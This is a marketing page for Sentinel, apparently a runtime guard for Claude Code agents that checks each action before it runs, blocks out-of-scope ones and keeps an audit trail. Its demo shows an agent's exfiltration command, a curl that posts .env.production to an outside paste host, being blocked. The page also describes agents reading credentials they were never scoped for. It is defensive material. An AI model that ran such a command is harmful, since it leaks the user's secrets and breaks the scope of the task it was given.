Runtime behavioral security for AI agents

Every action your AI agents take, enforced in real time.

Your Claude Code agents read files, call tools, and run commands across your systems. Sentinel checks each action against what you allowed, blocks the moment one steps out of bounds, and records every decision to an immutable trail your team can audit, trace, and govern.

Deterministic at the core. In your own boundary. Zero runtime cost.

$npm install @tuent/sentinel && npx sentinel init claude-code
Copy
Book a live demo

One command. Your next Claude Code session is protected.

Open source
Apache 2.0 licensed, inspect every line.
Blocks the real threats
Credential reads and data exfiltration, stopped before they run.
Learns your guardrails
Your approvals and denials become the policy.
claude-code · sentinel
› Triage the failing build and open a PR with the fix.
Read, Edit · src/build.tsallowed
Bash(curl paste.lol -d @.env.production)blocked
Sends a secrets file to an unlisted host. Does not match
the task. Intent drift, caught before it ran. No model in the decision.
Sentinel recommends a policy update
This role denied network egress 4 times this week.
Recommend deny network  [ approve ]  [ adjust ]
Stopped at the pre-execution gate
Deterministic, no model in the path
Then it recommends a policy fix
The problem

An agent does not stop to ask. It acts.

One wrong tool call reads a secret, ships your data, or runs a destructive command. By the time a human reviews the transcript, the side effect has already landed.

read_secret
Reads credentials it was never scoped to touch.
network_egress
Sends your data to an endpoint you never approved.
run_command
Executes a destructive command in the middle of a task.
edit_file
Rewrites files well outside its assigned lane.
One system, two views

The developer keeps shipping. The security team stays in control.

Same enforcement underneath, two surfaces on top. The developer sees only their own work. The security owner sees the whole fleet and gets to the five things that need a human in ten seconds.

sentinel · operations console · acme-eng
all Claude Code user machine id workspace
Endpoints
4,812
Sessions
3,318
Quarantined
480
Need review
5
Needs your review5 of 480 flagged
Credential read on production secret
j.reyes · jc-mbp16 · payments-api · hard rule
critical
Skill "auto-deploy" reaches for env vars
14 devs affected · cross-org pattern
critical
Agent hit an unlisted external host
m.osei · mo-wkstn · data-pipeline · escalated to model
high
Five denials, session quarantined
a.khan · ak-mbp14 · auth-service
high
475 informational findings loggedOpen triage →
(Tuent)/Sentinelyour workspace
Agent pausednow
Tried to read .env.production during "refactor the invoice formatter."
Out of scope for this task · claude-code
Release and continue
Keep blocked
Behavior normal
142 known patterns · 1 deviation today
Was this stop correct?
Yes
No
The console above · for the security team

Five to act on, not five hundred.

Every endpoint, ranked. Sentinel rolls a repeated threat across many developers into one finding instead of hundreds.

Drill down by user, machine id, or workspace
Cross-org patterns: one bad skill, one alert
Central policy pushed on login, not editable at the endpoint
The card above · for the developer

Never blocked for long.

One clear card: what the agent tried, why it stopped, and a single button to release it. No dashboards, no rules, no noise.

Plain reason tied to the task you typed
One-click release on soft flags, hard rules stay locked
One question back: was this stop correct
How it works

Deterministic where it has to be. Judgment only where it helps.

Every action is checked before it runs. The rules that protect credentials are fixed and never touch a model. Only the genuinely ambiguous cases escalate, and only to a model you own.

agent intent
proposed action
deterministic core
block or allow
escalate
gray area only
logged
on the record
01
Role boundary
Each agent is scoped to a role. Anything outside it is denied.
02
Intent alignment
Every action is checked against the task the agent was given.
03
Behavioral baseline
Deviation from an agent's normal pattern is caught in real time.
04
Policy
Scoped per role, versioned with your repo, enforced before side effects land.
Optional escalation, in your boundary
Ambiguous cases can escalate to a model you bring: Anthropic, Gemini, or an open source endpoint. It runs on-prem and Tuent never sees the data. Credentials never escalate. They are blocked deterministically.
It gets sharper over time
When an escalation overturns a stop, Sentinel proposes a permanent policy change, so the same case resolves deterministically next time. False stops trend down release over release.
Policies

You never write a policy. Sentinel learns it.

As your developers approve and deny actions, Sentinel learns what is normal for each workspace. Once the pattern is clear it recommends a specific policy in plain language and waits for a person to approve it. Nothing is enforced from a guess, and there is nothing to write.

Learns from real approvals and denials, per workspace.
Recommends in plain language, a human approves.
No rules to write, no files to maintain.
sentinel · recommended policy · payments-api
Learned from 28 approvals and 3 denials this week. Approve to enforce.
allowread src and docs26x
allowedit src19x
denyread .env and secretsdenied 3x
escalateunlisted hosts to your model
Approve policy
Adjust
Coverage

Exactly what Sentinel watches.

Every action in the agent's path, evaluated in process at the moment it happens. Mapped to the agent loop, here is what runs through the checkpoints.

+Tool and file calls. Every read, write, and tool invocation the agent makes.
+Shell commands. Including a guard on irreversible, destructive ones.
+MCP calls. Local and hosted, evaluated like any other action.
+Skills. The most common agent surface, wired in first.
+Network egress. Checked against an allowed-host list before it leaves.
+Intent drift. When behavior stops matching the task the agent was given.
Integrations

Built for Claude Code, with more on the way.

Sentinel ships today as a native Claude Code hook. One line of init and every action routes through the checkpoints. More runtimes are next.

Claude Code
Available now
MCP servers
Coming soon
Custom agents
Coming soon
CI pipelines
Coming soon
<1ms
Core decision
0
Tokens on the core path
4
Defense layers
100%
Actions logged
FAQ

Questions, answered.

Does Sentinel use an LLM to make decisions?+

The core is deterministic and runs in process, with no model on the block path. Credentials and hard rules are always decided that way. Only genuinely ambiguous cases can escalate to a model, and you choose which one. It runs in your boundary, never on Tuent's.

Will it slow my agents down?+

No. Checks run in the same process as your agent and finish in well under a millisecond. There is no network hop, so the overhead is not something you or your agents will notice.

What happens when an action is blocked?+

It is stopped at the pre-execution checkpoint before it runs, so the side effect never lands. The agent gets a denial, the event is written to the audit trail, and on a soft flag the developer can release it in one click.

How does Sentinel know what to allow and deny?+

You do not write rules. Sentinel learns from the actions your developers approve and deny, then recommends a specific policy in plain language for a person to approve. Credentials and other hard rules are blocked by default from day one.

Which agents does it cover?+

Claude Code today, through a native hook. That is the only live integration to start. Support for additional runtimes is on the roadmap, and the policy model is built to extend without forking per tool.

Is any of my data sent off the machine?+

No. Sentinel runs on-prem. Even model escalation uses an endpoint you bring, inside your own boundary, so nothing about your agents, code, or actions reaches Tuent.

Put every agent action on the record.

Install Sentinel, scope your first role, and watch the audit log fill in real time. See the developer view and the admin view side by side.

$npm install @tuent/sentinel && npx sentinel init claude-code
Copy
Book a live demo